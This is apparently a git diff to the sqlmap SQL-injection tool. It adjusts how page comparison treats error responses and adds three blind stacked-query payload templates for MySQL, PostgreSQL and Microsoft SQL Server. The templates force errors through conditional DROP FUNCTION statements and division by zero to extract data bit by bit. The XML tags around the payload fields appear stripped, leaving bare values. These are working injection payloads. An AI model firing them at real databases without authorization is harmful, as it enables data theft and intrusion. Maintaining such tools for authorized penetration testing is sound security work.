diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 5c85eef17..e6e38ba6c 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -50,6 +50,7 @@ from lib.core.exception import sqlmapUserQuitException
from lib.core.session import setDynamicMarkings
from lib.core.settings import CONSTANT_RATIO
from lib.core.settings import UNKNOWN_DBMS_VERSION
+from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.threads import getCurrentThreadData
from lib.core.unescaper import unescaper
@@ -315,6 +316,11 @@ def checkSqlInjection(place, parameter, value):
kb.matchRatio = None
_ = Request.queryPage(cmpPayload, place, raise404=False)
+ # If in the comparing stage there was an error
+ # then anything non-error will be considered as True
+ if kb.errorIsNone and kb.matchRatio is None:
+ kb.matchRatio = LOWER_RATIO_BOUND
+
# Perform the test's True request
trueResult = Request.queryPage(reqPayload, place, raise404=False)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index d62c8aad3..1efa79b02 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1558,6 +1558,67 @@ Formats:
+
+
+ MySQL forced-error blind stacked queries
+ 1
+ 3
+ 0
+ 0
+ 1
+ ; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);
+
+ ; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);
+ #
+
+
+ ; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);
+
+
+ MySQL
+
+
+
+
+ PostgreSQL forced-error blind stacked queries
+ 1
+ 3
+ 0
+ 0
+ 2
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END);
+
+ ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END);
+ --
+
+
+ ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END);
+
+
+
+
+ Microsoft SQL Server/Sybase forced-error blind stacked queries
+ 1
+ 3
+ 0
+ 0
+ 1
+ ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];
+
+ ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];
+ --
+
+
+ ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];
+
+
+ Microsoft SQL Server
+ Windows
+
+
+
+
+
MySQL > 5.0.11 AND time-based blind